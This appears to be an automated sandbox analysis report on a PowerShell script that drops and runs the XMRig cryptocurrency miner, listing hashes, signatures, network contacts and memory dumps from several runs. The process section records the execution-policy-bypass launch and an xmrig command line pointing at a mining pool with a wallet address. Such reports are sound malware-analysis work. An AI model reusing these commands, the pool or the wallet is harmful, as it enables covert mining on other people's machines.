SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/420-10-0x00007FFA54280000-0x00007FFA54C6C000-memory.dmp

memory/420-26-0x00007FFA54280000-0x00007FFA54C6C000-memory.dmp

memory/420-62-0x0000023453B00000-0x0000023453B0A000-memory.dmp

memory/420-49-0x0000023453B10000-0x0000023453B22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3868-91-0x000001A4E8650000-0x000001A4E8670000-memory.dmp

memory/3868-92-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-93-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/420-94-0x00007FFA54283000-0x00007FFA54284000-memory.dmp

memory/420-95-0x00007FFA54280000-0x00007FFA54C6C000-memory.dmp

memory/420-96-0x00007FFA54280000-0x00007FFA54C6C000-memory.dmp

memory/3868-97-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-98-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-99-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-100-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-101-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-102-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-103-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-104-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-105-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-106-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-107-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-108-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-109-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-110-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-111-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-112-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-113-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-114-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-115-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-116-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-117-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-118-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-119-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-120-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-121-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-122-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-123-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-124-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-125-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-126-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-127-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-128-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-129-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-130-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-131-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-132-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-133-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-134-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-135-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-136-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-137-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-138-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-139-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-140-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-141-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-142-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-143-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-144-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-145-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-146-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-147-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-148-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-149-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-150-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-151-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-152-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-153-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-154-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-155-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-156-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-157-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:01

Platform

win11-20240419-en

Max time kernel

1791s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/3872-0-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0oxev03.nw2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3872-7-0x00000213C4D80000-0x00000213C4DA2000-memory.dmp

memory/3872-10-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/3872-11-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/3872-12-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/3872-14-0x00000213C52A0000-0x00000213C52B2000-memory.dmp

memory/3872-15-0x00000213C5190000-0x00000213C519A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1976-46-0x000001E42D530000-0x000001E42D550000-memory.dmp

memory/1976-47-0x000001E42D570000-0x000001E42D590000-memory.dmp

memory/1976-48-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/3872-49-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp

memory/3872-50-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/1976-52-0x000001E4C14E0000-0x000001E4C1500000-memory.dmp

memory/1976-53-0x000001E42D590000-0x000001E42D5B0000-memory.dmp

memory/1976-51-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-54-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-55-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-56-0x000001E4C14E0000-0x000001E4C1500000-memory.dmp

memory/1976-57-0x000001E42D590000-0x000001E42D5B0000-memory.dmp

memory/1976-58-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-59-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-60-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-61-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-62-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-63-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-64-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-65-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-66-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-67-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-68-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-69-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-70-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-71-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-72-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-73-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-74-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-75-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-76-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-77-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-78-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-79-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-80-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-81-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-82-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-83-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-84-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-85-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-86-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-87-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-88-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-89-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-90-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-91-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-92-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-93-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-94-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-95-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-96-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-97-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-98-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-99-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-100-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-101-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-102-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-103-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-104-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-105-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-106-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-107-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-108-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-109-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-110-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-111-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-112-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-113-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-114-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-115-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-116-0x00007FF755650000-0x00007FF756283000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:03

Platform

win11-20240419-en

Max time kernel

1800s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/748-0-0x00007FFB70013000-0x00007FFB70015000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mpd1vbh.xiz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/748-9-0x000001E4FE5B0000-0x000001E4FE5D2000-memory.dmp

memory/748-10-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/748-11-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/748-12-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/748-14-0x000001E4FE5E0000-0x000001E4FE5F2000-memory.dmp

memory/748-15-0x000001E4FE590000-0x000001E4FE59A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2952-46-0x000001EF16680000-0x000001EF166A0000-memory.dmp

memory/2952-47-0x000001EF166C0000-0x000001EF166E0000-memory.dmp

memory/2952-48-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/748-49-0x00007FFB70013000-0x00007FFB70015000-memory.dmp

memory/2952-52-0x000001EF16700000-0x000001EF16720000-memory.dmp

memory/2952-51-0x000001EF166E0000-0x000001EF16700000-memory.dmp

memory/748-50-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/2952-53-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/748-54-0x00007FFB70010000-0x00007FFB70AD2000-memory.dmp

memory/2952-55-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-56-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-58-0x000001EF16700000-0x000001EF16720000-memory.dmp

memory/2952-57-0x000001EF166E0000-0x000001EF16700000-memory.dmp

memory/2952-59-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-60-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-61-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-62-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-63-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-64-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-65-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-66-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-67-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-68-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-69-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-70-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-71-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-72-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-73-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-74-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-75-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-76-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-77-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-78-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-79-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-80-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-81-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-82-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-83-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-84-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-85-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-86-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-87-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-88-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-89-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-90-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-91-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-92-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-93-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-94-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-95-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-96-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-97-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-98-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-99-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-100-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-101-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-102-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-103-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-104-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-105-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-106-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-107-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-108-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-109-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-110-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-111-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-112-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-113-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-114-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-115-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-116-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

memory/2952-117-0x00007FF6354C0000-0x00007FF6360F3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10-20240611-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
